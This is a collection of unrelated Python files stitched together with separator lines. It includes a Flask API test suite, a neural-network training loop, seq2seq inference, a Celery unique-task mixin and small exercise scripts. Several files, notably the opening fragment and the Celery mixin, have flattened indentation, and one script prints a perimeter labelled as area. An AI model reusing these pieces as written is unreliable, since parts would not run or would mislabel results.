            radpat_objval_vec = np.append(radpat_objval_vec, ar_ff_mae_objval_vec.mean())
        if self.ar_ff_max_weight != 0:
            radpat_objval_vec = np.append(radpat_objval_vec, ar_ff_max_objval_vec.mean())
        return radpat_objval_vec
def func_cst_data_analyse(self, singlerun_export_folder, run_id, ff_export_sub_folder):
# Evaluate S parameters
spara_objval_vec = self.func_cst_data_spara_analyse(singlerun_export_folder)
# Evaluate farfield
radpat_objval_vec = self.func_cst_data_farfield_analyse(singlerun_export_folder, ff_export_sub_folder)
# Evaluate near-field AR
nf_ar_objval_vec = np.array([])
nf_ar_file_name = self.nf_ar_file_name
nf_ar_goal_val = self.nf_ar_goal
nf_ar_mae_weight = self.nf_ar_mae_weight
nf_ar_maxnorm_weight = self.nf_ar_maxnorm_weight
nf_ar_eva_freq_range_vec = self.nf_ar_eva_freq_range_vec
if nf_ar_mae_weight != 0:
nf_ar_objval_mae = self.func_nf_ar_objval_calc_maetrunc(singlerun_export_folder, nf_ar_file_name,
nf_ar_goal_val, nf_ar_eva_freq_range_vec,
nf_ar_mae_weight)
# Form NF AR objective value list
nf_ar_objval_vec = np.append(nf_ar_objval_vec, nf_ar_objval_mae)
if nf_ar_maxnorm_weight != 0:
nf_ar_objval_max = self.func_nf_ar_objval_calc_maxnormtrunc(singlerun_export_folder, nf_ar_file_name,
nf_ar_goal_val, nf_ar_eva_freq_range_vec,
nf_ar_maxnorm_weight)
# Form near-field AR objective value list
nf_ar_objval_vec = np.append(nf_ar_objval_vec, nf_ar_objval_max)
# Combine all objective values
objval_vec = np.concatenate((spara_objval_vec, radpat_objval_vec, nf_ar_objval_vec))
objval_total = objval_vec.sum()
# print objective values
objval_vec_str = np.array2string(objval_vec, precision=7, separator=',', suppress_small=True)
pring_msg = "Sim[%d]: ObjValVec = %s; ObjVal = %f;" % (run_id, objval_vec_str, objval_total)
print(pring_msg)
return objval_total, objval_vec
|
python
|
# -*- coding:utf-8 -*-
"""
@description:
"""
import os
import sys
import numpy as np
import torch
from jiwer import wer
import sacrebleu
sys.path.append('..')
import config
from data_reader import load_word_dict
from seq2seq_model import Seq2SeqModel
from utils.logger import logger
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
class Inference(object):
    """Thin wrapper that loads a trained seq2seq model and corrects sentences."""

    def __init__(self, arch, model_dir, embed_size=50, hidden_size=50, dropout=0.5, max_length=128,
                 batch_size=8, epochs=10, evaluate_during_training=True, eval_batch_size=64, evaluate_during_training_steps=2500):
        logger.debug("device: {}".format(device))
        if arch != "bert":
            # Only the BERT-based seq2seq architecture is supported here.
            logger.error('error arch: {}'.format(arch))
            raise ValueError("Model arch choose error. Must use one of seq2seq model.")
        # Bert Seq2seq model
        logger.debug('use bert seq2seq model.')
        use_cuda = torch.cuda.is_available()
        # Fall back to the library defaults whenever a falsy value was passed.
        model_args = {
            "reprocess_input_data": True,
            "overwrite_output_dir": True,
            "max_seq_length": max_length if max_length else 128,
            "train_batch_size": batch_size if batch_size else 8,
            "num_train_epochs": epochs if epochs else 10,
            "save_eval_checkpoints": False,
            "save_model_every_epoch": False,
            "silent": False,
            "evaluate_generated_text": True,
            "evaluate_during_training": evaluate_during_training,
            "evaluate_during_training_verbose": evaluate_during_training,
            "eval_batch_size": eval_batch_size if eval_batch_size else 64,
            "evaluate_during_training_steps": evaluate_during_training_steps if evaluate_during_training_steps else 2500,
            "use_multiprocessing": False,
            "save_best_model": True,
            "max_length": max_length if max_length else 128,  # The maximum length of the sequence
            "output_dir": model_dir if model_dir else "output/bertseq2seq_demo/",
        }
        # encoder_type=None, encoder_name=None, decoder_name=None
        self.model = Seq2SeqModel(arch, "{}/encoder".format(model_dir),
                                  "{}/decoder".format(model_dir), args=model_args, use_cuda=use_cuda)
        self.arch = arch
        self.max_length = max_length

    def predict(self, sentence_list):
        """Correct every sentence in *sentence_list*; spaces inside the model
        output are stripped before returning."""
        if self.arch != "bert":
            raise ValueError('error arch.')
        corrected_sents = self.model.predict(sentence_list)
        return [sent.replace(' ', '') for sent in corrected_sents]
if __name__ == "__main__":
    # Build the inference wrapper from the project-wide configuration module.
    m = Inference(config.arch,
                  config.model_dir,
                  embed_size=config.embed_size,
                  hidden_size=config.hidden_size,
                  dropout=config.dropout,
                  max_length=config.max_length,
                  batch_size=config.batch_size,
                  epochs=config.epochs,
                  evaluate_during_training=config.evaluate_during_training,
                  eval_batch_size=config.eval_batch_size,
                  evaluate_during_training_steps=config.evaluate_during_training_steps
                  )
    print('开始预测,以Tab键中止')
    # Interactive loop: a lone TAB character terminates the session.
    while True:
        inputs = input('输入文本:')
        if inputs == '\t':
            break
        print('纠错结果为:' + m.predict([inputs])[0])
|
python
|
# Copyright 2016, 2017 John J. Rofrano. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Products API Service Test Suite
Test cases can be run with the following:
nosetests -v --with-spec --spec-color
coverage report -m
codecov --token=$CODECOV_TOKEN
"""
import unittest
import os
import logging
import mock
from flask_api import status # HTTP Status Codes
import app.service as service
import app.vcap_services as vcap
#from mock import MagicMock, patch
from app.models import Products, DataValidationError, db
from .product_factory import ProductFactory
DATABASE_URI = os.getenv('DATABASE_URI', 'sqlite:///../db/test.db')
######################################################################
# T E S T C A S E S
######################################################################
class TestProductsServer(unittest.TestCase):
    """ Product Server Tests """

    @classmethod
    def setUpClass(cls):
        """ Run once before all tests """
        service.app.debug = False
        service.initialize_logging(logging.INFO)
        # Set up the test database
        service.app.config['SQLALCHEMY_DATABASE_URI'] = DATABASE_URI

    @classmethod
    def tearDownClass(cls):
        pass

    def setUp(self):
        """ Runs before each test """
        service.init_db()
        db.drop_all()  # clean up the last tests
        db.create_all()  # create new tables
        self.app = service.app.test_client()

    def tearDown(self):
        db.session.remove()
        db.drop_all()

    def _create_products(self, count):
        """ Factory method to create products in bulk """
        products = []
        for _ in range(count):
            test_product = ProductFactory()
            resp = self.app.post('/products',
                                 json=test_product.serialize(),
                                 content_type='application/json')
            self.assertEqual(resp.status_code, status.HTTP_201_CREATED, 'Could not create test product')
            new_product = resp.get_json()
            # Keep the server-assigned id so later GET/PUT/DELETE calls work
            test_product.id = new_product['id']
            products.append(test_product)
        return products

    def test_index(self):
        """ Test the Home Page """
        resp = self.app.get('/')
        self.assertEqual(resp.status_code, status.HTTP_200_OK)
        # data = resp.get_json()
        # self.assertEqual(data['name'], 'Product Demo REST API Service')

    def test_get_product_list(self):
        """ Get a list of Products """
        self._create_products(5)
        resp = self.app.get('/products')
        self.assertEqual(resp.status_code, status.HTTP_200_OK)
        data = resp.get_json()
        self.assertEqual(len(data), 5)

    def test_get_product(self):
        """ Get a single Product """
        # get the id of a product
        test_product = self._create_products(1)[0]
        resp = self.app.get('/products/{}'.format(test_product.id),
                            content_type='application/json')
        self.assertEqual(resp.status_code, status.HTTP_200_OK)
        data = resp.get_json()
        self.assertEqual(data['name'], test_product.name)

    def test_get_product_not_found(self):
        """ Get a Product that's not found """
        resp = self.app.get('/products/0')
        self.assertEqual(resp.status_code, status.HTTP_404_NOT_FOUND)

    def test_create_product(self):
        """ Create a new Product """
        test_product = ProductFactory()
        resp = self.app.post('/products',
                             json=test_product.serialize(),
                             content_type='application/json')
        self.assertEqual(resp.status_code, status.HTTP_201_CREATED)
        # Make sure location header is set
        location = resp.headers.get('Location', None)
        # Fixed weak assertion: assertTrue(location != None) -> assertIsNotNone
        self.assertIsNotNone(location)
        # Check the data is correct
        new_product = resp.get_json()
        self.assertEqual(new_product['name'], test_product.name, "Names do not match")
        self.assertEqual(new_product['category'], test_product.category, "Categories do not match")
        self.assertEqual(new_product['available'], test_product.available, "Availability does not match")
        # Check that the location header was correct
        resp = self.app.get(location,
                            content_type='application/json')
        self.assertEqual(resp.status_code, status.HTTP_200_OK)
        new_product = resp.get_json()
        self.assertEqual(new_product['name'], test_product.name, "Names do not match")
        self.assertEqual(new_product['category'], test_product.category, "Categories do not match")
        self.assertEqual(new_product['available'], test_product.available, "Availability does not match")

    def test_update_product(self):
        """ Update an existing Product """
        # create a product to update
        test_product = ProductFactory()
        resp = self.app.post('/products',
                             json=test_product.serialize(),
                             content_type='application/json')
        self.assertEqual(resp.status_code, status.HTTP_201_CREATED)
        # update the product
        new_product = resp.get_json()
        new_product['category'] = 'unknown'
        resp = self.app.put('/products/{}'.format(new_product['id']),
                            json=new_product,
                            content_type='application/json')
        self.assertEqual(resp.status_code, status.HTTP_200_OK)
        updated_product = resp.get_json()
        self.assertEqual(updated_product['category'], 'unknown')

    def test_unavailable_products(self):
        """ Update an existing Product to unavailable """
        # create a product to update
        test_product = ProductFactory()
        resp = self.app.post('/products',
                             json=test_product.serialize(),
                             content_type='application/json')
        self.assertEqual(resp.status_code, status.HTTP_201_CREATED)
        # update the product
        new_product = resp.get_json()
        new_product['available'] = True
        resp = self.app.put('/products/{}/unavailable'.format(new_product['id']),
                            json=new_product,
                            content_type='application/json')
        self.assertEqual(resp.status_code, status.HTTP_200_OK)
        updated_product = resp.get_json()
        self.assertEqual(updated_product['available'], False)

    def test_update_product_not_found(self):
        """ Update a Product that is not found """
        test_product = ProductFactory()
        resp = self.app.put('/products/0',
                            json=test_product.serialize(),
                            content_type='application/json')
        self.assertEqual(resp.status_code, status.HTTP_404_NOT_FOUND)

    def test_delete_product(self):
        """ Delete a Product """
        test_product = self._create_products(1)[0]
        resp = self.app.delete('/products/{}'.format(test_product.id),
                               content_type='application/json')
        self.assertEqual(resp.status_code, status.HTTP_204_NO_CONTENT)
        self.assertEqual(len(resp.data), 0)
        # make sure they are deleted
        resp = self.app.get('/products/{}'.format(test_product.id),
                            content_type='application/json')
        self.assertEqual(resp.status_code, status.HTTP_404_NOT_FOUND)

    def test_delete_all(self):
        """ Delete DB """
        self._create_products(5)
        resp = self.app.get('/products')
        self.assertEqual(resp.status_code, status.HTTP_200_OK)
        resp = self.app.delete('/products/reset',
                               content_type='application/json')
        self.assertEqual(resp.status_code, status.HTTP_204_NO_CONTENT)

    def test_query_product_list_by_category(self):
        """ Query Products by Category """
        products = self._create_products(10)
        test_category = products[0].category
        category_products = [product for product in products if product.category == test_category]
        resp = self.app.get('/products',
                            query_string='category={}'.format(test_category))
        self.assertEqual(resp.status_code, status.HTTP_200_OK)
        data = resp.get_json()
        self.assertEqual(len(data), len(category_products))
        # check the data just to be sure
        for product in data:
            self.assertEqual(product['category'], test_category)

    def test_method_not_allowed(self):
        """ Test sending an invalid http method """
        resp = self.app.post('/products/1')
        self.assertEqual(resp.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)

    # Commenting out the URI because it works with Travis but
    # will not work on the IBM Environment
    # def test_database_uri(self):
    #     """Test database URI is available"""
    #     self.assertEqual(vcap.get_database_uri(), 'postgres://postgres:postgres@localhost:5432/postgres')

    @mock.patch('app.service.Products.find_by_name')
    def test_search_bad_data(self, products_find_mock):
        """ Test a search that returns bad data """
        products_find_mock.return_value = None
        resp = self.app.get('/products', query_string='name=widget1')
        self.assertEqual(resp.status_code, status.HTTP_500_INTERNAL_SERVER_ERROR)

    @mock.patch('app.service.Products.find_by_name')
    def test_mediatype_not_supported(self, media_mock):
        """ Handles unsupported media requests with 415_UNSUPPORTED_MEDIA_TYPE """
        media_mock.side_effect = DataValidationError()
        resp = self.app.post('/products', query_string='name=widget1', content_type='application/pdf')
        self.assertEqual(resp.status_code, status.HTTP_415_UNSUPPORTED_MEDIA_TYPE)

    @mock.patch('app.service.Products.find_by_name')
    def test_method_not_supported(self, method_mock):
        """ Handles unsupported HTTP methods with 405_METHOD_NOT_SUPPORTED """
        method_mock.side_effect = None
        resp = self.app.put('/products', query_string='name=widget1')
        self.assertEqual(resp.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)

    @mock.patch('app.service.Products.find_by_name')
    def test_bad_request(self, bad_request_mock):
        """ Test a Bad Request error from Find By Name """
        bad_request_mock.side_effect = DataValidationError()
        resp = self.app.get('/products', query_string='name=widget1')
        self.assertEqual(resp.status_code, status.HTTP_400_BAD_REQUEST)

    # @patch('app.service.product.find_by_name')
    # def test_bad_request(self, bad_request_mock):
    #     """ Test a Bad Request error from Find By Name """
    #     bad_request_mock.side_effect = DataValidationError()
    #     resp = self.app.get('/products', query_string='name=fido')
    #     self.assertEqual(resp.status_code, status.HTTP_400_BAD_REQUEST)
    #
    # @patch('app.service.product.find_by_name')
    # def test_mock_search_data(self, product_find_mock):
    #     """ Test showing how to mock data """
    #     product_find_mock.return_value = [MagicMock(serialize=lambda: {'name': 'fido'})]
    #     resp = self.app.get('/products', query_string='name=fido')
    #     self.assertEqual(resp.status_code, status.HTTP_200_OK)
######################################################################
# M A I N
######################################################################
# Allow running this test module directly instead of through nosetests/pytest
if __name__ == '__main__':
    unittest.main()
|
python
|
"""Helper neural network training module."""
from collections import OrderedDict
from pathlib import Path
from time import time
import torch
from torch import nn
from torch.utils.tensorboard import SummaryWriter
from ..datasets import IMAGE_SHAPES, get_loader
from ..models import fit_to_dataset, get_model
from ..models.utils import propagate_bounds
from .utils import (AverageMeter, bounds_logits, compute_accuracy,
get_device_order, manual_seed)
__all__ = ['train_classifier', 'one_epoch']
def train_classifier(evaluate_only, dataset, model, pretrained, learning_rate,
                     momentum, weight_decay, epsilon, factor, temperature,
                     epochs, batch_size, jobs, checkpoint, resume, log_dir,
                     seed):
    """Train and/or evaluate a network.

    Performs an initial evaluation pass, then (unless ``evaluate_only``)
    trains with SGD and step learning-rate decay, optionally resuming from
    ``resume``, saving the best model to ``checkpoint`` and logging metrics
    to TensorBoard under ``log_dir``.
    """
    manual_seed(seed, benchmark_otherwise=True)
    resume = Path(resume if resume else '')
    checkpoint = Path(checkpoint if checkpoint else '')

    def get_lr(epoch):
        # Step decay: divide the learning rate by 10 every 30 epochs.
        return learning_rate * (0.1**(epoch // 30))

    # get available cuda devices ordered by total memory capacity
    devices = get_device_order()
    if devices:
        print(f'=> using {len(devices)} GPU(s)')
        device = torch.device(f'cuda:{devices[0]}')
    else:
        device = torch.device('cpu')

    def to_device(*tensors, non_blocking=True):
        return [t.to(device, non_blocking=non_blocking) for t in tensors]

    # Data loading code
    cuda = len(devices) > 0
    train_loader = get_loader(dataset, True, batch_size, cuda, jobs)
    val_loader = get_loader(dataset, False, batch_size, cuda, jobs)
    norm = train_loader.dataset.transform.transforms[-1]
    # Per-channel width of the input domain in normalized units
    # ((1 - m) / s + m / s simplifies to 1 / s); averaged over channels.
    input_ranges = [(1 - m) / s + m / s for m, s in zip(norm.mean, norm.std)]
    input_range = sum(input_ranges) / len(input_ranges)
    # create the model
    if pretrained:
        print(f'=> using pre-trained model {model}')
    else:
        print(f'=> creating model {model}')
    net = fit_to_dataset(get_model(model, pretrained), dataset).eval()
    # Capture parameter names before any DataParallel wrapping so that
    # checkpoints are saved under the unwrapped module's key names.
    keys = net.state_dict(keep_vars=True).keys()
    # define loss function (criterion) and optimizer
    criterion = nn.CrossEntropyLoss()
    to_device(net, criterion, non_blocking=False)  # Module.to() is in-place
    optimizer = torch.optim.SGD(
        net.parameters(),
        learning_rate,
        momentum=momentum,
        weight_decay=weight_decay)

    # define a closure wrapping one_epoch()
    def process(loader, optimizer=None):
        return one_epoch(loader, net, criterion, optimizer, to_device,
                         epsilon * input_range, factor, temperature)

    # optionally resume from a checkpoint
    best_acc1 = 0
    start_epoch = 0
    if resume.is_file():
        print("=> loading checkpoint '{}'".format(resume))
        state = torch.load(resume)
        start_epoch = state['epoch']
        best_acc1 = state['best_acc1']
        net.load_state_dict(state['state_dict'])
        optimizer.load_state_dict(state['optimizer'])
        print(f"=> loaded checkpoint '{resume}' (epoch {state['epoch']})")
    elif resume != Path():
        print(f"=> no checkpoint found at '{resume}'")
    # DataParallel will divide and allocate batch_size to all GPUs
    if len(devices) > 1:
        if model.startswith('alexnet') or model.startswith('vgg'):
            net.features = nn.DataParallel(net.features, devices, device)
        else:
            net = nn.DataParallel(net, devices, device)
    # evaluate the model before training
    progress = process(val_loader)
    val_loss = progress['Loss']
    val_acc = progress['Acc@1']
    print(f'Test[{val_loss}: {val_acc}%]')
    if evaluate_only:
        return
    if log_dir:
        writer = SummaryWriter(log_dir)
        example_image = torch.randn(1, *IMAGE_SHAPES[dataset], device=device)
        writer.add_graph(net, (example_image,))
    lr = get_lr(start_epoch)
    for epoch in range(start_epoch, epochs):
        # decay the learning rate by 10 every 30 epochs
        if epoch % 30 == 0:
            lr = get_lr(epoch)
            for param_group in optimizer.param_groups:
                param_group['lr'] = lr
        # train for one epoch and evaluate on validation set
        train_progress = process(train_loader, optimizer)
        train_loss = train_progress['Loss']
        train_acc = train_progress['Acc@1']
        val_progress = process(val_loader)
        val_loss = val_progress['Loss']
        val_acc = val_progress['Acc@1']
        print(f'[{epoch + 1}@{lr:.4e}] '
              f'Train[{train_loss}: {train_acc}%] '
              f'Test[{val_loss}: {val_acc}%]')
        if log_dir:
            # Fixed misspelled metric tag: 'Train/LearingRate' -> 'Train/LearningRate'
            writer.add_scalar('Train/LearningRate', lr, epoch)
            for meter in train_progress.values():
                writer.add_scalar(f'Train/{meter.name}', meter.avg, epoch)
            for meter in val_progress.values():
                writer.add_scalar(f'Test/{meter.name}', meter.avg, epoch)
        # remember best acc@1 and save checkpoint
        if val_acc.avg >= best_acc1:
            best_acc1 = val_acc.avg
            if checkpoint != Path():
                parameters = net.state_dict().values()
                torch.save({
                    'epoch': epoch + 1,
                    'state_dict': OrderedDict(zip(keys, parameters)),
                    'best_acc1': best_acc1,
                    'optimizer': optimizer.state_dict(),
                }, checkpoint)
        # NaN is the only value that compares unequal to itself — stop once
        # the loss diverges (assumes the meter's comparison reflects its value)
        if train_loss != train_loss:
            print('Training was stopped (reached NaN)!')
            break
    if log_dir:
        writer.close()
def one_epoch(train_loader, net, criterion, optimizer, preporcess, epsilon,
              factor, temperature):
    """Perform one training (or, with ``optimizer=None``, evaluation) epoch.

    Iterates over ``train_loader``, computing the classification loss plus an
    optional bounds-based robustness term (active when both ``epsilon`` and
    ``factor`` are positive).  Gradient steps are taken only when an
    ``optimizer`` is supplied; otherwise gradients are disabled entirely.

    ``preporcess`` (sic — name kept for backward compatibility) is a callable
    that moves ``(inputs, targets)`` to the right device.

    Returns a dict mapping meter name -> AverageMeter for batch time, data
    time, loss, top-1 and top-5 accuracy.
    """
    batch_time = AverageMeter('Time/BatchTotal', ':6.3f')
    data_time = AverageMeter('Time/BatchData', ':6.3f')
    losses = AverageMeter('Loss', ':.4e')
    top1 = AverageMeter('Acc@1', ':6.2f')
    top5 = AverageMeter('Acc@5', ':6.2f')
    # switch to train mode
    is_training = optimizer is not None
    net.train(is_training)

    def compute_loss(inputs, targets, update_metrics):
        # compute output
        output = net(inputs)
        loss = criterion(output, targets)
        # compute bounds loss: propagate interval bounds through the network
        # and penalize with a temperature-scaled cross-entropy term
        if epsilon > 0 and factor > 0:
            bounds = propagate_bounds(net, inputs, epsilon)
            logits = bounds_logits(output, bounds.offset, targets)
            max_abs_logits = logits.abs().max(1).values.view(-1, 1)
            logits = logits / (temperature * max_abs_logits)
            loss += factor * criterion(logits, targets)
        # measure accuracy and record loss (only on the first call per batch,
        # so optimizers that re-evaluate the closure don't double-count)
        if update_metrics:
            n = inputs.size(0)
            acc1, acc5 = compute_accuracy(  # pylint: disable=E0632
                output, targets, top_k=(1, 5))
            losses.update(float(loss), n)
            top1.update(float(acc1), n)
            top5.update(float(acc5), n)
        # compute gradient
        if is_training:
            optimizer.zero_grad()
            loss.backward()
        return loss

    with torch.set_grad_enabled(is_training):
        end = time()
        for inputs, targets in train_loader:
            # measure data loading time
            data_time.update(time() - end)
            # move data to device
            inputs, targets = preporcess(inputs, targets)
            first_time = True

            def closure():
                # Closure protocol for optimizer.step(); metrics are only
                # updated on the first evaluation of each batch.
                nonlocal first_time
                loss = compute_loss(
                    inputs,  # pylint: disable=W0640
                    targets,  # pylint: disable=W0640
                    first_time,
                )
                first_time = False
                return loss

            if is_training:
                optimizer.step(closure)
            else:
                closure()
            # measure elapsed time
            batch_time.update(time() - end)
            end = time()
    return {x.name: x for x in (batch_time, data_time, losses, top1, top5)}
|
python
|
from PyQt5 import QtWidgets
from otter.OListView import OListView
class TemplatesTab(QtWidgets.QWidget):
    """
    Tab with the list of templates shown on the MainWindow
    """

    def __init__(self, parent):
        super().__init__(parent)
        main_layout = QtWidgets.QVBoxLayout()
        main_layout.setContentsMargins(10, 10, 10, 0)
        # Single-selection list of available templates
        self.template_list = OListView(self)
        self.template_list.setEmptyMessage("No templates")
        self.template_list.setSelectionMode(
            QtWidgets.QAbstractItemView.SingleSelection)
        main_layout.addWidget(self.template_list)
        button_layout = QtWidgets.QHBoxLayout()
        button_layout.setContentsMargins(0, 0, 0, 0)
        self.new_button = QtWidgets.QPushButton("New", self)
        self.new_button.setContentsMargins(0, 0, 10, 0)
        button_layout.addWidget(self.new_button)
        button_layout.addStretch()
        self.open_button = QtWidgets.QPushButton("Open", self)
        button_layout.addWidget(self.open_button)
        main_layout.addLayout(button_layout)
        self.setLayout(main_layout)
        self.new_button.clicked.connect(self.onNew)
        self.open_button.clicked.connect(self.onOpen)
        self.updateWidgets()

    def updateWidgets(self):
        """
        Update controls: 'Open' is enabled only while exactly one template
        is selected.
        """
        if len(self.template_list.selectedIndexes()) == 1:
            # Bug fix: setEnabled() was called without its required bool
            # argument, which raises a TypeError at runtime.
            self.open_button.setEnabled(True)
        else:
            self.open_button.setEnabled(False)
        # NOTE(review): nothing visible here re-invokes updateWidgets() when
        # the selection changes — confirm a selectionChanged hook exists.

    def onNew(self):
        """
        Called when clicked on 'New' button
        """

    def onOpen(self):
        """
        Called when clicked on 'Open' button
        """
|
python
|
import string
def alphabetSubsequence(s):
    """Return True when the characters of *s* occupy strictly increasing
    positions in the lowercase alphabet.

    Characters outside a-z yield position -1 and therefore make the result
    False; the empty string is vacuously True.
    """
    previous_index = -1
    for character in s:
        current_index = string.ascii_lowercase.find(character)
        if current_index <= previous_index:
            # Repeated, decreasing, or non-lowercase character (-1)
            return False
        previous_index = current_index
    return True


s = "effg"
print(alphabetSubsequence(s))
|
python
|
import os
import sys
import inspect
import string
import numpy as np
PycQED_py3_dir = "D:\\Github\\PycQED_py3"
AssemblerDir = PycQED_py3_dir + \
"\\instrument_drivers\\physical_instruments\\_controlbox"
currentdir = os.path.dirname(os.path.abspath(
inspect.getfile(inspect.currentframe())))
parentdir = os.path.dirname(currentdir)
sys.path.append(AssemblerDir)
import Assembler
import old_assembler
# Compare the instruction streams produced by the new and old assemblers
# for a single assembly input file given on the command line.
qasm_ext = ".txt"

print('Number of arguments:', len(sys.argv), 'arguments.')
print('Argument List:', str(sys.argv))
if len(sys.argv) != 2:
    print("Error: Asm2Mem only receives one arguments as the assembly file.")
    exit(0)

rawinput = sys.argv[1]
print("The file read from the argument is:", rawinput)

asm_name = rawinput
if not os.path.isfile(asm_name):
    print("\tError! The file does not exist")
    # Bug fix: execution previously continued after this message (and
    # crashed later when opening the file); stop here like the other checks.
    exit(0)
if (asm_name[-len(qasm_ext):] != qasm_ext):
    print("\t Error! The input asm file should have the", qasm_ext,
          "extension. ")
    exit(0)

# Assemble with both implementations and compare the results
asm1 = Assembler.Assembler(asm_name)
instructions1 = asm1.convert_to_instructions()
asm2 = old_assembler.Assembler(asm_name)
instructions2 = asm2.convert_to_instructions()
print("compare Result: ", np.array_equal(instructions1, instructions2))
assert(len(instructions1) == len(instructions2))
print("instructions1", '\t', "instructions2")
for ins1, ins2 in zip(instructions1, instructions2):
    print(ins1, '\t', ins2)
|
python
|
# Read three floating-point side lengths from one whitespace-separated line.
val = input().split()
a, b, c = val
a = float(a)
b = float(b)
c = float(c)
# Triangle inequality: each side must be shorter than the sum of the others.
# Bug fix: the first condition compared a against (a+b), which is always
# true for positive b, instead of against (b+c).
if a < (b+c) and b < (c+a) and c < (a+b):
    per = a + b + c
    # NOTE(review): 'per' holds the perimeter, yet the label says 'Area' —
    # confirm which quantity the specification actually expects.
    print('Area = %.2f' %per)
|
python
|
import pandas
import numpy
import filepaths
import utils
def fetch_ng_inflation_cpi():
    """Download the Nigerian CPI spreadsheet and write a tidy CSV.

    Reads the source URL from the stats metadata, extracts the year, month
    and observation columns from the Excel sheet, forward-fills the blank
    (merged-cell) year entries, maps month names to zero-padded numbers and
    writes 'YYYY-MM' / observation rows to the configured output file.
    """
    stats_metadata = utils.read_stats_metadata()
    url = stats_metadata['NG']['inflation']['CPI']['url']
    tmp_filepath = utils.download_file(url)
    df = pandas.read_excel(tmp_filepath, sheet_name='Table1', header=None)
    # Rows 17..330 hold the monthly records (header/footer rows dropped)
    df = df[17:331]
    output_df = pandas.DataFrame({'year': df.iloc[:, 0], 'month': df.iloc[:, 1], 'observation': df.iloc[:, 5]})
    # The year column only carries a value on the first month of each year;
    # forward-fill the blanks with the last seen year.
    # Bug fix: the old code tested `i is numpy.NaN`, an identity check that
    # misses float NaNs that are not the numpy.NaN singleton, and silently
    # dropped values of any other type — producing a list shorter than the
    # frame and a length-mismatch error on assignment below.
    clean_years = []
    last_year = 0
    for raw_year in output_df.year.to_list():
        if pandas.isna(raw_year):
            clean_years.append(last_year)
        else:
            clean_years.append(raw_year)
            last_year = raw_year
    output_df.year = clean_years
    # some months are 3-letter, others are full name – replace with number value
    month_map = {
        'Jan': '01', 'Feb': '02', 'Mar': '03', 'Apr': '04', 'May': '05', 'Jun': '06', 'Jul': '07', 'Aug': '08', 'Sep': '09', 'Oct': '10', 'Nov': '11', 'Dec': '12',
        'January': '01', 'February': '02', 'March': '03', 'April': '04', 'May': '05', 'June': '06', 'July': '07', 'August': '08', 'September': '09', 'October': '10', 'November': '11', 'December': '12',
    }
    output_df.month = output_df.month.map(month_map)
    output_df["month"] = output_df["year"].astype(str) + '-' + output_df["month"]
    output_df.drop('year', axis=1, inplace=True)
    output_filepath = filepaths.DATA_DIR / stats_metadata['NG']['inflation']['CPI']['filename']
    output_df.to_csv(output_filepath, index=False)
# Allow running the fetch as a standalone script
if __name__ == '__main__':
    fetch_ng_inflation_cpi()
|
python
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
import datetime
UNIQUE_REDIS_KEY_PREFIX = 'celery_unique'
class UniqueTaskMixin(object):
abstract = True
unique_key = None
redis_client = None
    def apply_async(self, args=None, kwargs=None, task_id=None, producer=None, link=None, link_error=None, **options):
        """Apply tasks asynchronously by sending a message.
        This method serves either as a wrapper for `celery.Task.apply_async()` or, if the task decorator
        was configured with a `redis_client`, callable `unique_key` and `apply_async()` was called with
        either an `eta` or `countdown` argument, the task will be treated as unique. In these cases,
        this method will first revoke any extant task which matches the same unique key configuration
        before proceeding to publish the task. Before returning, a unique task's identifying unique key
        will be saved to Redis as a key, with its task id (provided by the newly-created `AsyncResult` instance)
        serving as the value.
        @see `celery.Task.apply_async()`
        """
        # Unique handling only applies when all three conditions hold:
        # a callable key generator, a scheduled (not immediate) task, and a
        # configured Redis client to track it with.
        should_handle_as_unique_task = (
            callable(self.unique_key)
            and ('eta' in options.keys() or 'countdown' in options.keys())
            and self.redis_client is not None
        )
        if should_handle_as_unique_task:
            # Generate the unique redis key and revoke any task that shares the same key (if one exists)
            unique_redis_key = self._make_redis_key(args, kwargs)
            self._revoke_extant_unique_task_if_exists(unique_redis_key)
        # Pass the task along to Celery for publishing and intercept the AsyncResult return value
        rv = super(UniqueTaskMixin, self).apply_async(args, kwargs, task_id, producer, link, link_error, **options)
        if should_handle_as_unique_task:
            # Create a Redis key/value pair to serve as a tracking record for the newly-created task.
            # The new record will be given a TTL that allows it to expire (approximately) at the same time
            # that the task is executed.
            ttl = self._make_ttl_for_unique_task_record(options)
            self._create_unique_task_record(unique_redis_key, rv.task_id, ttl)
        return rv
def _make_redis_key(self, callback_args, callback_kwargs):
    """Build the Redis key that identifies this task's unique configuration.

    The key has three colon-delimited parts: the global unique-task prefix
    (`UNIQUE_REDIS_KEY_PREFIX`), the task name, and the value produced by the
    task's `unique_key` callable when given the same positional and keyword
    arguments that the task itself will receive.

    @param callback_args: Positional arguments the task will be called with.
    @type callback_args: list | tuple
    @param callback_kwargs: Keyword arguments the task will be called with.
    @type callback_kwargs: dict
    @return: The Redis key under which any extant duplicate of this task is tracked.
    @rtype: unicode
    """
    # Unwrap a bound/static-wrapped callable back to the underlying function, if any.
    key_generator = getattr(self.unique_key, '__func__', self.unique_key)
    key_suffix = key_generator(
        *(callback_args or ()),
        **(callback_kwargs or {})
    )
    return '{prefix}:{task_name}:{unique_key}'.format(
        prefix=UNIQUE_REDIS_KEY_PREFIX,
        task_name=self.name,
        unique_key=key_suffix,
    )
def _revoke_extant_unique_task_if_exists(self, redis_key):
"""Given a Redis key, deletes the corresponding record if one exists.
@param redis_key: The string (potentially) used by Redis as the key for the record
@type redis_key: str | unicode
"""
task_id = self.redis_client.get(redis_key)
if task_id is not None:
self.app.AsyncResult(task_id).revoke()
self.redis_client.delete(redis_key)
def _create_unique_task_record(self, redis_key, task_id, ttl):
"""Creates a new Redis key/value pair for the recently-published unique task.
@param redis_key: The unique key which identifies the task and its configuration (expected to be produced
by the `UniqueTaskMixin._make_redis_key()` method).
@type redis_key: str | unicode
@param task_id: The ID of the recently-published unique task, which will be used as the Redis value
@param ttl: The TTL for the Redis record, which should be (approximately) equal to the number of seconds
remaining until the earliest time that the task is expected to be executed by Celery.
"""
self.redis_client.set(redis_key, task_id, ex=ttl)
